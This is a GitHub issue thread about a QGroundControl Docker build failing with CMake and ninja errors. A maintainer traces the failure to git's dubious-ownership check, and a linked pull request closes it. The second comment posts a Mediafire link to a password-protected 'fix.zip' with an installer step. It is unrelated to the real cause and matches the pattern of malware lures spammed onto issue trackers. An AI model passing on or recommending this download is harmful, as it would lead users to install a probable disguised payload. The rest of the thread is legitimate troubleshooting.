mavlink/qgroundcontrol #11808: Docker CMake Error

haselnussbier, 2024-08-26:
OS: Ubuntu 24.04
Docker: 27.1.2
QGC: master

When running `./deploy/docker/run-docker.sh` I receive the following Errors:
`ninja: error: loading 'build.ninja': No such file or directory`
`CMake Error: Not a file: /project/build/cmake_install.cmake`
`CMake Error: Error processing file: /project/build/cmake_install.cmake`
Here is the full log:
[docker.log](https://github.com/user-attachments/files/16750297/docker.log)

ZiQiangZhou, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nested-slk, 2024-08-27:
I got the same error on ubuntu 22.04
` ninja --version 
1.10.1
`

HTRamsey, 2024-08-28:
Looks like it's due to the `fatal: detected dubious ownership in repository at '/project/source'`
Can you try the chown method [here](https://stackoverflow.com/questions/72978485/git-submodule-update-failed-with-fatal-detected-dubious-ownership-in-reposit)

PR #11827 (2024-08-30): Docker: Fix git error during configure
Closes #11808

fatal: detected dubious ownership in repository at '/project/source'
To add an exception for this directory, call:

	git config --global --add safe.directory /project/source
closed 2024-08-30 by HTRamsey